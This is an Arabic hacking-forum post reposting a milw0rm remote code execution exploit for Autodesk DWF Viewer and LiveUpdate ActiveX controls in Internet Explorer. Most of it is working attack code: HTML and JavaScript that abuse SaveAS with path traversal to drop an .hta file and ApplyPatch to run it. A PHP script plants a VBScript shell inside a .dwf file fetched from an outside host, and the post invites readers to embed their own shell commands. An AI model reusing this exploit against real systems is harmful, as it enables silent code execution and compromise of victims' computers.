top left
منـتديـات منـظمـة الإخـتـراق الـعـالـمـية
قديم منذ /10-02-2008, 02:17 AM   #1

SubSEven7II
 
الصورة الرمزية SubSEven7II
Supervisor-General

SubSEven7II غير متصل

 رقم العضوية : 102324
 تاريخ التسجيل : Mar 2008
 المشاركات : 2,108
 النقاط : SubSEven7II على طريق الإبداع

Downloads: 0
Uploads: 0
شكراً: 0
تم شكره 9 مرة في 7 مشاركة
افتراضي Autodesk DWF Viewer Control / LiveUpdate Module remote code execution exploit

<!--
Autodesk DWF Viewer Control / LiveUpdate Module remote code execution exploit
by Nine:Situations:Group::bruiser
site: rgod web pages
tested against IE6

tested software: Revit Architecture 2009 sp2
Autodesk Design Review 2009 (which also comes with Revit)


dll settings (both):
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
KillBitSet: False

The first vulnerability is caused due to the CExpressViewerControl class
(AdView.dll v9.0.0.96) which provide the insecure SaveAS() method
which allows to store locally files with arbitrary extension.
The second one is related to the ApplyPatch() one inside the UpdateEngine
class (LiveUpdate16.DLL, 17.2.56 ??... this is a shared one) which allows to launch an arbitrary
executable by the second argument. Note, that the first one, alone, allows
arbitrary code execution. The impact of the second one is limited if you cannot
specify command arguments or launch a file of yours.

The embedded dwf file (located at the url http://retrogod.altervista.org/suntzu.dwf)
has been created modifying an existing one, replacing a .png resource file with
a vbscript shell through the following script (note the PCLZIP_OPT_NO_COMPRESSION flag,
this has been used to preserve the code, note also the dwg files are
essentially zips) :

<?php
//library:
//http://www.phpconcept.net/pclzip/index.en.php#download
include_once('pclzip.lib.php');

$archive = new PclZip('suntzu.dwf');

//modify path
$list = $archive->add("com.autodesk.dwf.ePlot_CD186DAA4322089243B14 0AD3ACE11B7\\A84650EE-74A7-4766-8D0C-CC9EAE8313D3.png", PCLZIP_OPT_NO_COMPRESSION);

if ($list == 0) {
echo "ERROR : ".$archive->errorInfo(true);
}
?>

take a look to suntzu.dwf with an hex-editor...
This exploit launch calc.exe but you can embed your own vbscript shell
and extended shell commands, by using the php code given.
-->
<HTML>
<OBJECT CLASSID="clsid:A662DA7E-CCB7-4743-B71A-D817F6D575DF"
WIDTH="640" HEIGHT="480"
id='CExpressViewerControl' >
<PARAM NAME="Src"
VALUE="http://retrogod.altervista.org/suntzu.dwf">
</OBJECT>
<OBJECT CLASSID='clsid:89EC7921-729B-4116-A819-DF86A4A5776B'
id='UpdateEngine' />
</OBJECT>
<script type="text/javascript">
<!--
strPatchFile = "..\\..\\..\\..\\..\\..\\..\\suntzu.hta";

try
{
CExpressViewerControl.SaveAS (strPatchFile);
}
catch(e)
{
document.write("impossible to save suntzu.hta ...");
}
finally
{
}
strProductCode="whatever" ;

try
{
UpdateEngine.ApplyPatch (strProductCode , strPatchFile);
}
catch(e)
{
document.write("impossible to execute suntzu.hta ...");
}
finally
{
}

-->
</script>

# milw0rm.com [2008-09-30]







::/توقـيـع/:: SubSEven7II

[CENTER][URL=http://up107.arabsh.com/][IMG]http://up107.arabsh.com/s/1i8lrgtjq9.gif[/IMG][/URL][IMG]http://mlfnt.net/up/files/bii0pjgedib0zu2i30k4.gif[/IMG][/CENTER]
  رد مع اقتباس
رد

مواقع النشر (المفضلة)


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
طرق مشاهدة الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة


المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
devalcms 1.4a XSS / Remote Code Execution Exploit zeoos :: Local Root Exploit :: 0 09-05-2008 06:50 PM
TGS CMS 0.3.2r2 Remote Code Execution Exploit zeoos :: Local Root Exploit :: 0 08-03-2008 11:30 PM
Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit zeoos :: Local Root Exploit :: 0 04-01-2008 06:10 PM
Vuln: Retired: Open-Realty 'adodb-perf-module.inc.php' Remote Code Execution Vulnerab HACKERS_3006 :: Local Root Exploit :: 0 02-10-2008 01:40 AM
Vuln: Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution Vulnerabilit HACKERS_3006 :: Local Root Exploit :: 0 01-28-2008 10:20 PM


 

الساعة الآن 04:58 PM.
تعريب و ترقية أستايل HoStVb.NeT
Powered by: vBulletin Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
منـتديـات منـظمـة الإخـتـراق الـعـالـمـية

 

 

 

top right